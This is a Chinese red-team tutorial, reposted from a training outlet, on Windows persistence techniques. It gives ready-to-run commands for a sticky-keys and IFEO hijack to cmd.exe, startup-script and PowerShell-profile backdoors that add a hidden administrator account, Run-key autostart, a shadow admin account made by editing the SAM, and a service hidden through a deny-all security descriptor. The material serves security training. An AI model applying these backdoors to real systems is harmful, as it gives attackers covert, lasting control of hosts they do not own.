文库 | HW之红队常见Windows的几种权限维持

admin 2022年5月26日02:55:16HW&HVV评论28 views3266字阅读10分53秒阅读模式

高质量的安全文章,安全offer面试经验分享

尽在 # 掌控安全EDU #



作者:掌控安全—杰斯


上期学到关于HW之红队常见Windows的几种提权方法在获取权限之后,一般需要使用一些技术对主机的权限进行维持,以保持我们对目标主机的长期控制在获取到目标主机的权限后...


而权限维持,在红蓝对抗中,我觉得其意义在于两点:


一是防止已获取的权限被蓝队破坏;


二是防止其他红队获取到相同的权限


那么今天就结了一些关于Windows常见的几种权限维持,希望对你们有所帮助.


1.映像劫持技术

简介

“映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。

当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定

而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据

最终得以设定一个程序的堆管理机制和一些辅助机制等。

出于简化原因,IFEO使用忽略路径的方式来匹配它所要控制的程序文件名,所以程序无论放在哪个路径,只要名字没有变化,它就运行出问题。

简单点说,当你打开的是程序A,而运行的却是程序B。

复现

执行命令,将cmd.exe程序劫持粘滞键。


REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:windowssystem32cmd.exe"

文库 | HW之红队常见Windows的几种权限维持

连续按5次shift键之后,目标系统弹出cmd.exe,并不是之前的粘滞键界面


文库 | HW之红队常见Windows的几种权限维持

2.策略组脚本维持

简介

Windows操作系统的组策略是配置计算机中某一些用户组策略的程序,由系统管理员操作控制计算机程序、访问网络资源、操作行为、各种软件设置的最主要工具。

复现

第一步:准备一个bat脚本,内容为:net user qiesi abc123.. /add & net localgroup administrators qiesi /add ;

并将脚本放到C:WindowsSystem32GroupPolicyMachineScriptsStartup中


文库 | HW之红队常见Windows的几种权限维持


第二步:【gpedit.msc】打开组策略,在 【windows 设置】-> 【脚本(启动/关机】-> 启动 -> 添加1.bat。

这样的话,每一次启动都会创建一个qiesi账户。


文库 | HW之红队常见Windows的几种权限维持


第三步:重启服务器


文库 | HW之红队常见Windows的几种权限维持

3.辅助功能之粘滞键

简介

辅助功能提供了其他选项(屏幕键盘、放大镜、屏幕阅读),可以帮助人更轻松地使用Windows操作系统,但是此功能可能会被滥用,以在已启用RDP且已获得管理员级别权限的主机上实现持久性

复现

第一步:将sethc.exe拥有者改为administrator。


文库 | HW之红队常见Windows的几种权限维持


第二步:输入命令


move C:windowssystem32sethc.exe C:windowssystem32sethc1.exe
Copy C:windowssystem32cmd.exe C:windowssystem32sethc.exe


第三步:连续按5次shift


文库 | HW之红队常见Windows的几种权限维持


最后,除了shift之外,还有以下这些也可以尝试


文库 | HW之红队常见Windows的几种权限维持


4.注册表自启动

简介

注册表是windows操作系统中的一个核心数据库,其中存放着各种参数,直接控制着windows的启动、硬件驱动程序的装载以及一些windows应用程序的运行,从而在整个系统中起着核心作用


这些作用包括了软、硬件的相关配置和状态信息,比如注册表中保存有应用程序和资源管理器外壳的初始条件、首选项和卸载数据等,联网计算机的整个系统的设置和各种许可,文件扩展名与应用程序的关联,硬件部件的描述、状态和属性,性能记录和其他底层的系统状态信息,以及其他数据等。

复现

第一步:输入命令

reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionRun" /v "test2" /t REG_SZ /d "C:WindowsSystem32notepad.exe" /f

文库 | HW之红队常见Windows的几种权限维持


第二步:重启服务器,自动会打开notepad.exe

文库 | HW之红队常见Windows的几种权限维持

5.powershell配置文件后门

简介

Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。


Powershell配置文件其实就是一个powershell脚本,他可以在每次运行powershell的时候自动运行,所以可以通过向该文件写入自定义的语句用来长期维持权限。

复现

第一步:准备1.bat脚本,内容为:net user qiesi abc123.. /add & net localgroup administrators qiesi /add


文库 | HW之红队常见Windows的几种权限维持


第二步:打开Windows PowerShell ,输入以下命令


  1. echo $profile # 查看当前是否存在配置文件。

  2. Test-path $profile # 如果返回Flase 则可以进行配置

  3. New-Item -Path $profile -Type File Force # 创建配置文件

  4. $string = 'Start-Process "C:1.bat"'

  5. $string | Out-File -FilePath $profile -Append

  6. more $profile # 查看文件

文库 | HW之红队常见Windows的几种权限维持


第三步:重新打开powershell就会自动执行

文库 | HW之红队常见Windows的几种权限维持


6.建立影子账号

简介

影子账户,顾名思义就是隐藏的账户,在“控制面板-用户账户”里面是看不见,但却有管理员权限的账户

复现

第一步:创建一个带$符号的账户。


文库 | HW之红队常见Windows的几种权限维持


第二步:打开注册表


HEKY_LOCAL_MACHINESAMSAMDomainsAccountUser。


将管理员对应的F项的值,复制粘贴到qiesi$用户的对应F项的值。


文库 | HW之红队常见Windows的几种权限维持



第三步:导出用户及对应的项的注册表文件,删除掉用户。


文库 | HW之红队常见Windows的几种权限维持


第四步:重新导入,双击reg文件即可。


文库 | HW之红队常见Windows的几种权限维持


第五步:登陆目标服务器,利用影子账号。


首先,管理账户中并没有qiesi$账户

文库 | HW之红队常见Windows的几种权限维持


远程登陆


文库 | HW之红队常见Windows的几种权限维持


7.利用安全描述符隐藏服务后门进行权限维持

简介

windows访问控制模型分为两部分:1.access token(访问令牌)。2.安全描述符。安全描述符包含与安全对象关联的安全信息。安全描述符包含安全描述符结构及其关联的安全信息。可以利用sc来进行创建。

复现

第一步:cmd创建自启动服务

sc create ".NET CLR Networking 3.5.0.0" binpath= "cmd.exe /k C:WindowsSystem32notepad.exe" depend= Tcpip obj= Localsystem start= auto

文库 | HW之红队常见Windows的几种权限维持

文库 | HW之红队常见Windows的几种权限维持


第二步:隐藏服务


  1. sc sdset ".NET CLR Networking 3.5.0.0" "D:(D;;DCLCWPDTSD;;;IU)

  2. (D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)

  3. (A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)

  4. (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

文库 | HW之红队常见Windows的几种权限维持


申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.



回顾往期内容

Xray挂机刷漏洞

零基础学黑客,该怎么学?

网络安全人员必考的几本证书!

文库|内网神器cs4.0使用说明书

代码审计 | 这个CNVD证书拿的有点轻松

【精选】SRC快速入门+上分小秘籍+实战指南

    代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!

文库 | HW之红队常见Windows的几种权限维持


扫码白嫖视频+工具+进群+靶场等资料


文库 | HW之红队常见Windows的几种权限维持

 


文库 | HW之红队常见Windows的几种权限维持

 扫码白嫖


 还有免费的配套靶场交流群

原文始发于微信公众号(掌控安全EDU):文库 | HW之红队常见Windows的几种权限维持

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月26日02:55:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  文库 | HW之红队常见Windows的几种权限维持 http://cn-sec.com/archives/1049937.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: